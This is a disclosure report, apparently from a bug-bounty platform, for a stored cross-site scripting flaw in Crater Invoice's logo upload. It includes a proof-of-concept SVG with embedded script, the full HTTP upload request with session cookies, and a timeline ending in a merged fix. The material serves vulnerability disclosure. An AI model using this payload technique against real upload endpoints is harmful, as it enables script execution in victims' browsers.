Cross-site Scripting (XSS) - Stored in crater-invoice/crater

Valid

Reported on

Jan 16th 2022


Description

There is a vulnerability in the upload avatar functionality of crater invoice which would allow an attacker to upload malicious .SVG files in order to execute Javascript. All that is required is that the victim browse to the link location of the .SVG file

Proof of Concept

xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("svg xss");
   </script>
</svg>

Request:

POST /api/v1/company/upload-logo HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
company: 2
X-XSRF-TOKEN: eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------202251926415456929271193356967
Content-Length: 735
Origin: https://demo.craterapp.com
DNT: 1
Connection: keep-alive
Referer: https://demo.craterapp.com/admin/settings/company-info
Cookie: __stripe_mid=7d4c8a79-b568-4a3b-a898-67c90bb47968edd571; __stripe_sid=1cf6fd84-0a75-41ee-af21-ad527c27e72ce39a5c; XSRF-TOKEN=eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJaTTJTc0E3eVZWWXhjT3BZYnJlSnc9PSIsInZhbHVlIjoiTU5jaFY5MTk4SWRRZEZYMC8zSDkxZDhLMHp0NklPU1RtQUE3dEkwRzByMGVVY3BBSG1TeUI5ZkhKRGJsWHhybThEeFNjREdyd295UmVBV0h1dVAzb3Z6U3JiZ0ErNUtPTnRYMlpBNnJXR0lWN2JObGtDKzJ0MVRMaDVpSzlKOFQiLCJtYWMiOiIxYTc1YmM3OWZiYTM4OTA3ZWIwZWU5NzA5NGIxYzRkMGM2MGJlNTI0NjcyZGQ3ZWVjNWIyMTQzMTFhOGY5NjY4IiwidGFnIjoiIn0%3D; kQ8ZSOBtOqtWUFzuaiCYX7I5LKHRDCE3lwldiGew=eyJpdiI6IkQ3VE5lWjlINkU3Y1ZvUktSdkhSS1E9PSIsInZhbHVlIjoiSFBCcDNsYVd3K3JIL3BhVWRHUWs3THBmVEl1MWtOYmo4VzUrT2p2azhzV3ZoY2lWcUk0KzlXZWJOK3ZLbUtML3N6SGxXV3FjeGU1c0lvcGwrYnlMWTByNk9mbWcrcjlSd2VtNTVZcUtiTDJvb0pyUDhmdlJZUXc3cjlJOHMzZEJscXVWZGJzRmJyRzhNcEpENnNGOWxEK3d3S200OG5hd3duZ2tCazRZaDBVUWkvZlgxaWtoNC9HenlTb2QyVmlnY2pIUSt4bmw0YnkzWGNibjNKcWxkY1B3RzV3c0pHYURnNDJMRXBkUHFrWDEvQkdORkYzK0xXTVVoSEx3YldWN0J2ZEJkTytSWU1tR0VVUFhheTVMek1XWStiZnFrZTArU0pMUFhEWE8yZStkRkpzWS9oM1hsTk00L01mY2tWSko4NFdZcUtBRlo0N0QvMWZBZmR3bVRRU29zRXJyM3RZdmpDRGE4MG9EelR2eUQzZThQK1R2dDc0dEJoMmE2OTZMT3h1eWhZdXN3bkhjVTFrTThXTStPdzhtemkzMEdKdXRoTC96RXFtSzh3MEZJanFGRjI3bGpMN3hyTllrQjk5UFdpdUNiY3ZzQThyUjF3enVvZHpkc3p3TCt3eDJnQmxvUjZQWXNmRC9aWGdQMk0rcENPNmNaaTVEbk9QWit4bitGOENKRWpSSTR2UllXZFpuYUhEQmpidE40ZXFwZHVsYkMwbk84eDBGVzVSR2w4S0pXNDgwZUU2UjJpL0tIb2ZnIiwibWFjIjoiNDRmMDY0MjE5ZTNmNmE3ZGQ5Yzg2N2U1ZTYyZDk2MzU2YWQ3YTg1MDE2Y2FlYzcyN2MyNGZlODdjYmY4ZjFiMSIsInRhZyI6IiJ9
Sec-GPC: 1

-----------------------------202251926415456929271193356967
Content-Disposition: form-data; name="company_logo"

{"name":"xss.svg","data":"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICBhbGVydCgic3ZnIHhzcyIpOwogICA8L3NjcmlwdD4KPC9zdmc+Cg=="}
-----------------------------202251926415456929271193356967--

Response:

{"success":true}

Impact

This vulnerability is capable of Javascript code execution. An attacker can use this to upload a malicious .SVG file with Javascript embedded into it, then whenever a user visits the link to the .SVG file, the malicious Javascript would execute.

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 4 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 4 months ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. 4 months ago
Mohit Panjwani validated this vulnerability 4 months ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mohit Panjwani confirmed that a fix has been merged on cdc913 4 months ago
The fix bounty has been dropped
to join this conversation